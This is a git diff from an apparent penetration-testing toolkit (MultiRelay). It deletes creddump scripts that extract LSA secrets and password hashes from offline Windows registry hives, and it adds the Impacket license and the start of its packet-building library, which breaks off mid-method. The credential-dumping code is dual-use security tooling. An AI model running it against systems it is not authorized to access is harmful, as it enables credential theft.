- print("usage: %s " % sys.argv[0])
- print("\nExample (Windows Vista/7):")
- print("%s /path/to/System32/config/SYSTEM /path/to/System32/config/SECURITY true" % sys.argv[0])
- print("\nExample (Windows XP):")
- print("%s /path/to/System32/SYSTEM /path/to/System32/config/SECURITY false" % sys.argv[0])
-
-
-def dump(src, length=8):
- N = 0
- result = ''
- while src:
- s, src = src[:length], src[length:]
- hexa = ' '.join(["%02X" % x for x in s])
- s = ''.join(FILTER[b] for b in s)
- result += "%04X %-*s %s\n" % (N, length * 3, hexa, s)
- N += length
- return result
-
-
-if len(sys.argv) < 4 or sys.argv[3].lower() not in ["true", "false"]:
- showUsage()
- sys.exit(1)
-else:
- vista = sys.argv[3].lower() == "true"
-
-secrets = get_file_secrets(sys.argv[1], sys.argv[2], vista)
-if not secrets:
- print("Unable to read LSA secrets. Perhaps you provided invalid hive files?")
- sys.exit(1)
-
-for k in secrets:
- print(k.decode())
- print(dump(secrets[k], length=16))
diff --git a/tools/MultiRelay/creddump/pwdump.py b/tools/MultiRelay/creddump/pwdump.py
deleted file mode 100755
index 462df85..0000000
--- a/tools/MultiRelay/creddump/pwdump.py
+++ /dev/null
@@ -1,31 +0,0 @@
-#!/usr/bin/env python
-
-# This file is part of creddump.
-#
-# creddump is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# creddump is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with creddump. If not, see .
-
-"""
-@author: Brendan Dolan-Gavitt
-@license: GNU General Public License 2.0 or later
-@contact: bdolangavitt@wesleyan.edu
-"""
-
-import sys
-from framework.win32.hashdump import dump_file_hashes
-
-if len(sys.argv) < 3:
- print("usage: %s " % sys.argv[0])
- sys.exit(1)
-
-dump_file_hashes(sys.argv[1], sys.argv[2])
diff --git a/tools/MultiRelay/impacket-dev/LICENSE b/tools/MultiRelay/impacket-dev/LICENSE
new file mode 100644
index 0000000..159cdd1
--- /dev/null
+++ b/tools/MultiRelay/impacket-dev/LICENSE
@@ -0,0 +1,84 @@
+Licencing
+---------
+
+We provide this software under a slightly modified version of the
+Apache Software License. The only changes to the document were the
+replacement of "Apache" with "Impacket" and "Apache Software Foundation"
+with "SecureAuth Corporation". Feel free to compare the resulting
+document to the official Apache license.
+
+The `Apache Software License' is an Open Source Initiative Approved
+License.
+
+
+The Apache Software License, Version 1.1
+Modifications by SecureAuth Corporation (see above)
+
+Copyright (c) 2000 The Apache Software Foundation. All rights
+reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions
+are met:
+
+1. Redistributions of source code must retain the above copyright
+ notice, this list of conditions and the following disclaimer.
+
+2. Redistributions in binary form must reproduce the above copyright
+ notice, this list of conditions and the following disclaimer in
+ the documentation and/or other materials provided with the
+ distribution.
+
+3. The end-user documentation included with the redistribution,
+ if any, must include the following acknowledgment:
+ "This product includes software developed by
+ SecureAuth Corporation (https://www.secureauth.com/)."
+ Alternately, this acknowledgment may appear in the software itself,
+ if and wherever such third-party acknowledgments normally appear.
+
+4. The names "Impacket", "SecureAuth Corporation" must
+ not be used to endorse or promote products derived from this
+ software without prior written permission. For written
+ permission, please contact oss@secureauth.com.
+
+5. Products derived from this software may not be called "Impacket",
+ nor may "Impacket" appear in their name, without prior written
+ permission of SecureAuth Corporation.
+
+THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESSED OR IMPLIED
+WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
+OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE APACHE SOFTWARE FOUNDATION OR
+ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
+LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
+USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
+OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+SUCH DAMAGE.
+
+
+
+Smb.py and nmb.py are based on Pysmb by Michael Teo
+(https://miketeo.net/projects/pysmb/), and are distributed under the
+following license:
+
+This software is provided 'as-is', without any express or implied
+warranty. In no event will the author be held liable for any damages
+arising from the use of this software.
+
+Permission is granted to anyone to use this software for any purpose,
+including commercial applications, and to alter it and redistribute it
+freely, subject to the following restrictions:
+
+1. The origin of this software must not be misrepresented; you must
+ not claim that you wrote the original software. If you use this
+ software in a product, an acknowledgment in the product
+ documentation would be appreciated but is not required.
+
+2. Altered source versions must be plainly marked as such, and must
+ not be misrepresented as being the original software.
+
+3. This notice cannot be removed or altered from any source
+ distribution.
diff --git a/tools/MultiRelay/impacket-dev/impacket/ImpactPacket.py b/tools/MultiRelay/impacket-dev/impacket/ImpactPacket.py
new file mode 100644
index 0000000..5e84c42
--- /dev/null
+++ b/tools/MultiRelay/impacket-dev/impacket/ImpactPacket.py
@@ -0,0 +1,2130 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Description:
+# Network packet codecs basic building blocks.
+# Low-level packet codecs for various Internet protocols.
+#
+# Author:
+# Javier Burroni (javier)
+# Bruce Leidl (brl)
+# Javier Kohen (jkohen)
+from __future__ import division
+from __future__ import print_function
+import array
+import struct
+import socket
+import string
+import sys
+from binascii import hexlify
+from functools import reduce
+
+"""Classes to build network packets programmatically.
+
+Each protocol layer is represented by an object, and these objects are
+hierarchically structured to form a packet. This list is traversable
+in both directions: from parent to child and vice versa.
+
+All objects can be turned back into a raw buffer ready to be sent over
+the wire (see method get_packet).
+"""
+
+class ImpactPacketException(Exception):
+ def __init__(self, value):
+ self.value = value
+ def __str__(self):
+ return repr(self.value)
+
+class PacketBuffer(object):
+ """Implement the basic operations utilized to operate on a
+ packet's raw buffer. All the packet classes derive from this one.
+
+ The byte, word, long and ip_address getters and setters accept
+ negative indexes, having these the a similar effect as in a
+ regular Python sequence slice.
+ """
+
+ def __init__(self, length = None):
+ "If 'length' is specified the buffer is created with an initial size"
+ if length:
+ self.__bytes = array.array('B', b'\0' * length)
+ else:
+ self.__bytes = array.array('B')
+
+ def set_bytes_from_string(self, data):
+ "Sets the value of the packet buffer from the string 'data'"
+ self.__bytes = array.array('B', data)
+
+ def get_buffer_as_string(self):
+ "Returns the packet buffer as a string object"
+ return self.__bytes.tostring()
+
+ def get_bytes(self):
+ "Returns the packet buffer as an array"
+ return self.__bytes
+
+ def set_bytes(self, bytes):
+ "Set the packet buffer from an array"
+ # Make a copy to be safe
+ self.__bytes = array.array('B', bytes.tolist())
+
+ def set_byte(self, index, value):
+ "Set byte at 'index' to 'value'"
+ index = self.__validate_index(index, 1)
+ self.__bytes[index] = value
+
+ def get_byte(self, index):
+ "Return byte at 'index'"
+ index = self.__validate_index(index, 1)
+ return self.__bytes[index]
+
+ def set_word(self, index, value, order = '!'):
+ "Set 2-byte word at 'index' to 'value'. See struct module's documentation to understand the meaning of 'order'."
+ index = self.__validate_index(index, 2)
+ ary = array.array("B", struct.pack(order + 'H', value))
+ if -2 == index:
+ self.__bytes[index:] = ary
+ else:
+ self.__bytes[index:index+2] = ary
+
+ def get_word(self, index, order = '!'):
+ "Return 2-byte word at 'index'. See struct module's documentation to understand the meaning of 'order'."
+ index = self.__validate_index(index, 2)
+ if -2 == index:
+ bytes = self.__bytes[index:]
+ else:
+ bytes = self.__bytes[index:index+2]
+ (value,) = struct.unpack(order + 'H', bytes.tostring())
+ return value
+
+ def set_long(self, index, value, order = '!'):
+ "Set 4-byte 'value' at 'index'. See struct module's documentation to understand the meaning of 'order'."
+ index = self.__validate_index(index, 4)
+ ary = array.array("B", struct.pack(order + 'L', value))
+ if -4 == index:
+ self.__bytes[index:] = ary
+ else:
+ self.__bytes[index:index+4] = ary
+
+ def get_long(self, index, order = '!'):
+ "Return 4-byte value at 'index'. See struct module's documentation to understand the meaning of 'order'."
+ index = self.__validate_index(index, 4)
+ if -4 == index:
+ bytes = self.__bytes[index:]
+ else:
+ bytes = self.__bytes[index:index+4]
+ (value,) = struct.unpack(order + 'L', bytes.tostring())
+ return value
+
+ def set_long_long(self, index, value, order = '!'):
+ "Set 8-byte 'value' at 'index'. See struct module's documentation to understand the meaning of 'order'."
+ index = self.__validate_index(index, 8)
+ ary = array.array("B", struct.pack(order + 'Q', value))
+ if -8 == index:
+ self.__bytes[index:] = ary
+ else:
+ self.__bytes[index:index+8] = ary
+
+ def get_long_long(self, index, order = '!'):
+ "Return 8-byte value at 'index'. See struct module's documentation to understand the meaning of 'order'."
+ index = self.__validate_index(index, 8)
+ if -8 == index:
+ bytes = self.__bytes[index:]
+ else:
+ bytes = self.__bytes[index:index+8]
+ (value,) = struct.unpack(order + 'Q', bytes.tostring())
+ return value
+
+
+ def get_ip_address(self, index):
+ "Return 4-byte value at 'index' as an IP string"
+ index = self.__validate_index(index, 4)
+ if -4 == index:
+ bytes = self.__bytes[index:]
+ else:
+ bytes = self.__bytes[index:index+4]
+ return socket.inet_ntoa(bytes.tostring())
+
+ def set_ip_address(self, index, ip_string):
+ "Set 4-byte value at 'index' from 'ip_string'"
+ index = self.__validate_index(index, 4)
+ raw = socket.inet_aton(ip_string)
+ (b1,b2,b3,b4) = struct.unpack("BBBB", raw)
+ self.set_byte(index, b1)
+ self.set_byte(index + 1, b2)
+ self.set_byte(index + 2, b3)
+ self.set_byte(index + 3, b4)
+
+ def set_checksum_from_data(self, index, data):
+ "Set 16-bit checksum at 'index' by calculating checksum of 'data'"
+ self.set_word(index, self.compute_checksum(data))
+
+ def compute_checksum(self, anArray):
+ "Return the one's complement of the one's complement sum of all the 16-bit words in 'anArray'"
+ nleft = len(anArray)
+ sum = 0
+ pos = 0
+ while nleft > 1:
+ sum = anArray[pos] * 256 + (anArray[pos + 1] + sum)
+ pos = pos + 2
+ nleft = nleft - 2
+ if nleft == 1:
+ sum = sum + anArray[pos] * 256
+ return self.normalize_checksum(sum)
+
+ def normalize_checksum(self, aValue):
+ sum = aValue
+ sum = (sum >> 16) + (sum & 0xFFFF)
+ sum += (sum >> 16)
+ sum = (~sum & 0xFFFF)
+ return sum
+
+ def __validate_index(self, index, size):
+ """This method performs two tasks: to allocate enough space to
+ fit the elements at positions index through index+size, and to
+ adjust negative indexes to their absolute equivalent.
+ """
+
+ orig_index = index
+
+ curlen = len(self.__bytes)
+ if index < 0:
+ index = curlen + index
+
+ diff = index + size - curlen
+ if diff > 0:
+ self.__bytes.fromstring('\0' * diff)
+ if orig_index < 0:
+ orig_index -= diff
+
+ return orig_index
+
+class ProtocolLayer():
+ "Protocol Layer Manager for insertion and removal of protocol layers."
+
+ __child = None
+ __parent = None
+
+ def contains(self, aHeader):
+ "Set 'aHeader' as the child of this protocol layer"
+ self.__child = aHeader
+ aHeader.set_parent(self)
+
+ def set_parent(self, my_parent):
+ "Set the header 'my_parent' as the parent of this protocol layer"
+ self.__parent = my_parent
+
+ def child(self):
+ "Return the child of this protocol layer"
+ return self.__child
+
+ def parent(self):
+ "Return the parent of this protocol layer"
+ return self.__parent
+
+ def unlink_child(self):
+ "Break the hierarchy parent/child child/parent"
+ if self.__child:
+ self.__child.set_parent(None)
+ self.__child = None
+
+class ProtocolPacket(ProtocolLayer):
+ __HEADER_SIZE = 0
+ __BODY_SIZE = 0
+ __TAIL_SIZE = 0
+
+ __header = None
+ __body = None
+ __tail = None
+
+ def __init__(self, header_size, tail_size):
+ self.__HEADER_SIZE = header_size
+ self.__TAIL_SIZE = tail_size
+ self.__header=PacketBuffer(self.__HEADER_SIZE)
+ self.__body=PacketBuffer()
+ self.__tail=PacketBuffer(self.__TAIL_SIZE)
+
+ def __update_body_from_child(self):
+ # Update child raw packet in my body
+ if self.child():
+ body=self.child().get_packet()
+ self.__BODY_SIZE=len(body)
+ self.__body.set_bytes_from_string(body)
+
+ def __get_header(self):
+ return self.__header
+
+ header = property(__get_header)
+
+ def __get_body(self):
+ self.__update_body_from_child()
+ return self.__body
+
+ body = property(__get_body)
+
+ def __get_tail(self):
+ return self.__tail
+
+ tail = property(__get_tail)
+
+ def get_header_size(self):
+ "Return frame header size"
+ return self.__HEADER_SIZE
+
+ def get_tail_size(self):
+ "Return frame tail size"
+ return self.__TAIL_SIZE
+
+ def get_body_size(self):
+ "Return frame body size"
+ self.__update_body_from_child()
+ return self.__BODY_SIZE
+
+ def get_size(self):
+ "Return frame total size"
+ return self.get_header_size()+self.get_body_size()+self.get_tail_size()
+
+ def load_header(self, aBuffer):
+ self.__HEADER_SIZE=len(aBuffer)
+ self.__header.set_bytes_from_string(aBuffer)
+
+ def load_body(self, aBuffer):
+ "Load the packet body from string. "\
+ "WARNING: Using this function will break the hierarchy of preceding protocol layer"
+ self.unlink_child()
+ self.__BODY_SIZE=len(aBuffer)
+ self.__body.set_bytes_from_string(aBuffer)
+
+ def load_tail(self, aBuffer):
+ self.__TAIL_SIZE=len(aBuffer)
+ self.__tail.set_bytes_from_string(aBuffer)
+
+ def __extract_header(self, aBuffer):
+ self.load_header(aBuffer[:self.__HEADER_SIZE])
+
+ def __extract_body(self, aBuffer):
+ if self.__TAIL_SIZE<=0:
+ end=None
+ else:
+ end=-self.__TAIL_SIZE
+ self.__BODY_SIZE=len(aBuffer[self.__HEADER_SIZE:end])
+ self.__body.set_bytes_from_string(aBuffer[self.__HEADER_SIZE:end])
+
+ def __extract_tail(self, aBuffer):
+ if self.__TAIL_SIZE<=0:
+ # leave the array empty
+ return
+ else:
+ start=-self.__TAIL_SIZE
+ self.__tail.set_bytes_from_string(aBuffer[start:])
+
+ def load_packet(self, aBuffer):
+ "Load the whole packet from a string" \
+ "WARNING: Using this function will break the hierarchy of preceding protocol layer"
+ self.unlink_child()
+
+ self.__extract_header(aBuffer)
+ self.__extract_body(aBuffer)
+ self.__extract_tail(aBuffer)
+
+ def get_header_as_string(self):
+ return self.__header.get_buffer_as_string()
+
+ def get_body_as_string(self):
+ self.__update_body_from_child()
+ return self.__body.get_buffer_as_string()
+ body_string = property(get_body_as_string)
+
+ def get_tail_as_string(self):
+ return self.__tail.get_buffer_as_string()
+ tail_string = property(get_tail_as_string)
+
+ def get_packet(self):
+ self.__update_body_from_child()
+
+ ret = b''
+
+ header = self.get_header_as_string()
+ if header:
+ ret += header
+
+ body = self.get_body_as_string()
+ if body:
+ ret += body
+
+ tail = self.get_tail_as_string()
+ if tail:
+ ret += tail
+
+ return ret
+
+class Header(PacketBuffer,ProtocolLayer):
+ "This is the base class from which all protocol definitions extend."
+
+ packet_printable = [c for c in string.printable if c not in string.whitespace] + [' ']
+
+ ethertype = None
+ protocol = None
+ def __init__(self, length = None):
+ PacketBuffer.__init__(self, length)
+ self.auto_checksum = 1
+
+ def get_data_as_string(self):
+ "Returns all data from children of this header as string"
+
+ if self.child():
+ return self.child().get_packet()
+ else:
+ return None
+
+ def get_packet(self):
+ """Returns the raw representation of this packet and its
+ children as a string. The output from this method is a packet
+ ready to be transmitted over the wire.
+ """
+ self.calculate_checksum()
+
+ data = self.get_data_as_string()
+ if data:
+ return self.get_buffer_as_string() + data
+ else:
+ return self.get_buffer_as_string()
+
+ def get_size(self):
+ "Return the size of this header and all of it's children"
+ tmp_value = self.get_header_size()
+ if self.child():
+ tmp_value = tmp_value + self.child().get_size()
+ return tmp_value
+
+ def calculate_checksum(self):
+ "Calculate and set the checksum for this header"
+ pass
+
+ def get_pseudo_header(self):
+ "Pseudo headers can be used to limit over what content will the checksums be calculated."
+ # default implementation returns empty array
+ return array.array('B')
+
+ def load_header(self, aBuffer):
+ "Properly set the state of this instance to reflect that of the raw packet passed as argument."
+ self.set_bytes_from_string(aBuffer)
+ hdr_len = self.get_header_size()
+ if(len(aBuffer) < hdr_len): #we must do something like this
+ diff = hdr_len - len(aBuffer)
+ for i in range(0, diff):
+ aBuffer += '\x00'
+ self.set_bytes_from_string(aBuffer[:hdr_len])
+
+ def get_header_size(self):
+ "Return the size of this header, that is, not counting neither the size of the children nor of the parents."
+ raise RuntimeError("Method %s.get_header_size must be overridden." % self.__class__)
+
+ def list_as_hex(self, aList):
+ if len(aList):
+ ltmp = []
+ line = []
+ count = 0
+ for byte in aList:
+ if not (count % 2):
+ if (count % 16):
+ ltmp.append(' ')
+ else:
+ ltmp.append(' '*4)
+ ltmp.append(''.join(line))
+ ltmp.append('\n')
+ line = []
+ if chr(byte) in Header.packet_printable:
+ line.append(chr(byte))
+ else:
+ line.append('.')
+ ltmp.append('%.2x' % byte)
+ count += 1
+ if (count%16):
+ left = 16 - (count%16)
+ ltmp.append(' ' * (4+(left // 2) + (left*2)))
+ ltmp.append(''.join(line))
+ ltmp.append('\n')
+ return ltmp
+ else:
+ return []
+
+ def __str__(self):
+ ltmp = self.list_as_hex(self.get_bytes().tolist())
+
+ if self.child():
+ ltmp.append(['\n', str(self.child())])
+
+ if len(ltmp)>0:
+ return ''.join(ltmp)
+ else:
+ return ''
+
+
+
+class Data(Header):
+ """This packet type can hold raw data. It's normally employed to
+ hold a packet's innermost layer's contents in those cases for
+ which the protocol details are unknown, and there's a copy of a
+ valid packet available.
+
+ For instance, if all that's known about a certain protocol is that
+ a UDP packet with its contents set to "HELLO" initiate a new
+ session, creating such packet is as simple as in the following code
+ fragment:
+ packet = UDP()
+ packet.contains('HELLO')
+ """
+
+ def __init__(self, aBuffer = None):
+ Header.__init__(self)
+ if aBuffer:
+ self.set_data(aBuffer)
+
+ def set_data(self, data):
+ self.set_bytes_from_string(data)
+
+ def get_size(self):
+ return len(self.get_bytes())
+
+
+class EthernetTag(PacketBuffer):
+ """Represents a VLAN header specified in IEEE 802.1Q and 802.1ad.
+ Provides methods for convenient manipulation with header fields."""
+
+ def __init__(self, value=0x81000000):
+ PacketBuffer.__init__(self, 4)
+ self.set_long(0, value)
+
+ def get_tpid(self):
+ """Returns Tag Protocol Identifier"""
+ return self.get_word(0)
+
+ def set_tpid(self, value):
+ """Sets Tag Protocol Identifier"""
+ return self.set_word(0, value)
+
+ def get_pcp(self):
+ """Returns Priority Code Point"""
+ return (self.get_byte(2) & 0xE0) >> 5
+
+ def set_pcp(self, value):
+ """Sets Priority Code Point"""
+ orig_value = self.get_byte(2)
+ self.set_byte(2, (orig_value & 0x1F) | ((value & 0x07) << 5))
+
+ def get_dei(self):
+ """Returns Drop Eligible Indicator"""
+ return (self.get_byte(2) & 0x10) >> 4
+
+ def set_dei(self, value):
+ """Sets Drop Eligible Indicator"""
+ orig_value = self.get_byte(2)
+ self.set_byte(2, orig_value | 0x10 if value else orig_value & 0xEF)
+
+ def get_vid(self):
+ """Returns VLAN Identifier"""
+ return self.get_word(2) & 0x0FFF
+
+ def set_vid(self, value):
+ """Sets VLAN Identifier"""
+ orig_value = self.get_word(2)
+ self.set_word(2, (orig_value & 0xF000) | (value & 0x0FFF))
+
+ def __str__(self):
+ priorities = (
+ 'Best Effort',
+ 'Background',
+ 'Excellent Effort',
+ 'Critical Applications',
+ 'Video, < 100 ms latency and jitter',
+ 'Voice, < 10 ms latency and jitter',
+ 'Internetwork Control',
+ 'Network Control')
+
+ pcp = self.get_pcp()
+ return '\n'.join((
+ '802.1Q header: 0x{0:08X}'.format(self.get_long(0)),
+ 'Priority Code Point: {0} ({1})'.format(pcp, priorities[pcp]),
+ 'Drop Eligible Indicator: {0}'.format(self.get_dei()),
+ 'VLAN Identifier: {0}'.format(self.get_vid())))
+
+
+class Ethernet(Header):
+ def __init__(self, aBuffer = None):
+ Header.__init__(self, 14)
+ self.tag_cnt = 0
+ if(aBuffer):
+ self.load_header(aBuffer)
+
+ def set_ether_type(self, aValue):
+ "Set ethernet data type field to 'aValue'"
+ self.set_word(12 + 4*self.tag_cnt, aValue)
+
+ def get_ether_type(self):
+ "Return ethernet data type field"
+ return self.get_word(12 + 4*self.tag_cnt)
+
+ def get_tag(self, index):
+ """Returns an EthernetTag initialized from index-th VLAN tag.
+ The tags are numbered from 0 to self.tag_cnt-1 as they appear in the frame.
+ It is possible to use negative indexes as well."""
+ index = self.__validate_tag_index(index)
+ return EthernetTag(self.get_long(12+4*index))
+
+ def set_tag(self, index, tag):
+ """Sets the index-th VLAN tag to contents of an EthernetTag object.
+ The tags are numbered from 0 to self.tag_cnt-1 as they appear in the frame.
+ It is possible to use negative indexes as well."""
+ index = self.__validate_tag_index(index)
+ pos = 12 + 4*index
+ for i,val in enumerate(tag.get_bytes()):
+ self.set_byte(pos+i, val)
+
+ def push_tag(self, tag, index=0):
+ """Inserts contents of an EthernetTag object before the index-th VLAN tag.
+ Index defaults to 0 (the top of the stack)."""
+ if index < 0:
+ index += self.tag_cnt
+ pos = 12 + 4*max(0, min(index, self.tag_cnt))
+ data = self.get_bytes()
+ data[pos:pos] = tag.get_bytes()
+ self.set_bytes(data)
+ self.tag_cnt += 1
+
+ def pop_tag(self, index=0):
+ """Removes the index-th VLAN tag and returns it as an EthernetTag object.
+ Index defaults to 0 (the top of the stack)."""
+ index = self.__validate_tag_index(index)
+ pos = 12 + 4*index
+ tag = self.get_long(pos)
+ data = self.get_bytes()
+ del data[pos:pos+4]
+ self.set_bytes(data)
+ self.tag_cnt -= 1
+ return EthernetTag(tag)
+
+ def load_header(self, aBuffer):
+ self.tag_cnt = 0
+ while aBuffer[12+4*self.tag_cnt:14+4*self.tag_cnt] in (b'\x81\x00', b'\x88\xa8', b'\x91\x00'):
+ self.tag_cnt += 1
+
+ hdr_len = self.get_header_size()
+ diff = hdr_len - len(aBuffer)
+ if diff > 0:
+ aBuffer += b'\x00'*diff
+ self.set_bytes_from_string(aBuffer[:hdr_len])
+
+ def get_header_size(self):
+ "Return size of Ethernet header"
+ return 14 + 4*self.tag_cnt
+
+ def get_packet(self):
+
+ if self.child():
+ try:
+ self.set_ether_type(self.child().ethertype)
+ except:
+ " an Ethernet packet may have a Data() "
+ pass
+ return Header.get_packet(self)
+
+ def get_ether_dhost(self):
+ "Return 48 bit destination ethernet address as a 6 byte array"
+ return self.get_bytes()[0:6]
+
+ def set_ether_dhost(self, aValue):
+ "Set destination ethernet address from 6 byte array 'aValue'"
+ for i in range(0, 6):
+ self.set_byte(i, aValue[i])
+
+ def get_ether_shost(self):
+ "Return 48 bit source ethernet address as a 6 byte array"
+ return self.get_bytes()[6:12]
+
+ def set_ether_shost(self, aValue):
+ "Set source ethernet address from 6 byte array 'aValue'"
+ for i in range(0, 6):
+ self.set_byte(i + 6, aValue[i])
+
+ @staticmethod
+ def as_eth_addr(anArray):
+ tmp_list = [x > 15 and '%x'%x or '0%x'%x for x in anArray]
+ return '' + reduce(lambda x, y: x+':'+y, tmp_list)
+
+ def __str__(self):
+ tmp_str = 'Ether: ' + self.as_eth_addr(self.get_ether_shost()) + ' -> '
+ tmp_str += self.as_eth_addr(self.get_ether_dhost())
+ if self.child():
+ tmp_str += '\n' + str( self.child())
+ return tmp_str
+
+ def __validate_tag_index(self, index):
+ """Adjusts negative indices to their absolute equivalents.
+ Raises IndexError when out of range <0, self.tag_cnt-1>."""
+ if index < 0:
+ index += self.tag_cnt
+ if index < 0 or index >= self.tag_cnt:
+ raise IndexError("Tag index out of range")
+ return index
+
+# Linux "cooked" capture encapsulation.
+# Used, for instance, for packets returned by the "any" interface.
+class LinuxSLL(Header):
+ type_descriptions = [
+ "sent to us by somebody else",
+ "broadcast by somebody else",
+ "multicast by somebody else",
+ "sent to somebody else to somebody else",
+ "sent by us",
+ ]
+
+ def __init__(self, aBuffer = None):
+ Header.__init__(self, 16)
+ if (aBuffer):
+ self.load_header(aBuffer)
+
+ def set_type(self, type):
+ "Sets the packet type field to type"
+ self.set_word(0, type)
+
+ def get_type(self):
+ "Returns the packet type field"
+ return self.get_word(0)
+
+ def set_arphdr(self, value):
+ "Sets the ARPHDR value for the link layer device type"
+ self.set_word(2, type)
+
+ def get_arphdr(self):
+ "Returns the ARPHDR value for the link layer device type"
+ return self.get_word(2)
+
+ def set_addr_len(self, len):
+ "Sets the length of the sender's address field to len"
+ self.set_word(4, len)
+
+ def get_addr_len(self):
+ "Returns the length of the sender's address field"
+ return self.get_word(4)
+
+ def set_addr(self, addr):
+ "Sets the sender's address field to addr. Addr must be at most 8-byte long."
+ if (len(addr) < 8):
+ addr += b'\0' * (8 - len(addr))
+ self.get_bytes()[6:14] = addr
+
+ def get_addr(self):
+ "Returns the sender's address field"
+ return self.get_bytes()[6:14].tostring()
+
+ def set_ether_type(self, aValue):
+ "Set ethernet data type field to 'aValue'"
+ self.set_word(14, aValue)
+
+ def get_ether_type(self):
+ "Return ethernet data type field"
+ return self.get_word(14)
+
+ def get_header_size(self):
+ "Return size of packet header"
+ return 16
+
+ def get_packet(self):
+ if self.child():
+ self.set_ether_type(self.child().ethertype)
+ return Header.get_packet(self)
+
+ def get_type_desc(self):
+ type = self.get_type()
+ if type < len(LinuxSLL.type_descriptions):
+ return LinuxSLL.type_descriptions[type]
+ else:
+ return "Unknown"
+
+ def __str__(self):
+ ss = []
+ alen = self.get_addr_len()
+ addr = hexlify(self.get_addr()[0:alen])
+ ss.append("Linux SLL: addr=%s type=`%s'" % (addr, self.get_type_desc()))
+ if self.child():
+ ss.append(str(self.child()))
+
+ return '\n'.join(ss)
+
+
+class IP(Header):
+ ethertype = 0x800
+ def __init__(self, aBuffer = None):
+ Header.__init__(self, 20)
+ self.set_ip_v(4)
+ self.set_ip_hl(5)
+ self.set_ip_ttl(255)
+ self.__option_list = []
+ if(aBuffer):
+ # When decoding, checksum shouldn't be modified
+ self.auto_checksum = 0
+ self.load_header(aBuffer)
+
+ if sys.platform.count('bsd'):
+ self.is_BSD = True
+ else:
+ self.is_BSD = False
+
+
+ def get_packet(self):
+ # set protocol
+ if self.get_ip_p() == 0 and self.child():
+ self.set_ip_p(self.child().protocol)
+
+ # set total length
+ if self.get_ip_len() == 0:
+ self.set_ip_len(self.get_size())
+
+ child_data = self.get_data_as_string()
+
+ if self.auto_checksum:
+ self.reset_ip_sum()
+
+ my_bytes = self.get_bytes()
+
+ for op in self.__option_list:
+ my_bytes.extend(op.get_bytes())
+
+ # Pad to a multiple of 4 bytes
+ num_pad = (4 - (len(my_bytes) % 4)) % 4
+ if num_pad:
+ my_bytes.fromstring(b"\0"* num_pad)
+
+ # only change ip_hl value if options are present
+ if len(self.__option_list):
+ self.set_ip_hl(len(my_bytes) // 4)
+
+
+ # set the checksum if the user hasn't modified it
+ if self.auto_checksum:
+ self.set_ip_sum(self.compute_checksum(my_bytes))
+
+ if child_data is None:
+ return my_bytes.tostring()
+ else:
+ return my_bytes.tostring() + child_data
+
+
+
+ # def calculate_checksum(self, buffer = None):
+ # tmp_value = self.get_ip_sum()
+ # if self.auto_checksum and (not tmp_value):
+ # if buffer:
+ # tmp_bytes = buffer
+ # else:
+ # tmp_bytes = self.bytes[0:self.get_header_size()]
+ #
+ # self.set_ip_sum(self.compute_checksum(tmp_bytes))
+
+
+ def get_pseudo_header(self):
+ pseudo_buf = array.array("B")
+ pseudo_buf.extend(self.get_bytes()[12:20])
+ pseudo_buf.fromlist([0])
+ pseudo_buf.extend(self.get_bytes()[9:10])
+ tmp_size = self.child().get_size()
+
+ size_str = struct.pack("!H", tmp_size)
+
+ pseudo_buf.fromstring(size_str)
+ return pseudo_buf
+
+ def add_option(self, option):
+ self.__option_list.append(option)
+ sum = 0
+ for op in self.__option_list:
+ sum += op.get_len()
+ if sum > 40:
+ raise ImpactPacketException("Options overflowed in IP packet with length: %d" % sum)
+
+
+ def get_ip_v(self):
+ n = self.get_byte(0)
+ return (n >> 4)
+
+ def set_ip_v(self, value):
+ n = self.get_byte(0)
+ version = value & 0xF
+ n = n & 0xF
+ n = n | (version << 4)
+ self.set_byte(0, n)
+
+ def get_ip_hl(self):
+ n = self.get_byte(0)
+ return (n & 0xF)
+
+ def set_ip_hl(self, value):
+ n = self.get_byte(0)
+ len = value & 0xF
+ n = n & 0xF0
+ n = (n | len)
+ self.set_byte(0, n)
+
+ def get_ip_tos(self):
+ return self.get_byte(1)
+
+ def set_ip_tos(self,value):
+ self.set_byte(1, value)
+
+ def get_ip_len(self):
+ if self.is_BSD:
+ return self.get_word(2, order = '=')
+ else:
+ return self.get_word(2)
+
+ def set_ip_len(self, value):
+ if self.is_BSD:
+ self.set_word(2, value, order = '=')
+ else:
+ self.set_word(2, value)
+
+ def get_ip_id(self):
+ return self.get_word(4)
+ def set_ip_id(self, value):
+ return self.set_word(4, value)
+
+ def get_ip_off(self):
+ if self.is_BSD:
+ return self.get_word(6, order = '=')
+ else:
+ return self.get_word(6)
+
+ def set_ip_off(self, aValue):
+ if self.is_BSD:
+ self.set_word(6, aValue, order = '=')
+ else:
+ self.set_word(6, aValue)
+
+ def get_ip_offmask(self):
+ return self.get_ip_off() & 0x1FFF
+
+ def set_ip_offmask(self, aValue):
+ tmp_value = self.get_ip_off() & 0xD000
+ tmp_value |= aValue
+ self.set_ip_off(tmp_value)
+
+ def get_ip_rf(self):
+ return self.get_ip_off() & 0x8000
+
+ def set_ip_rf(self, aValue):
+ tmp_value = self.get_ip_off()
+ if aValue:
+ tmp_value |= 0x8000
+ else:
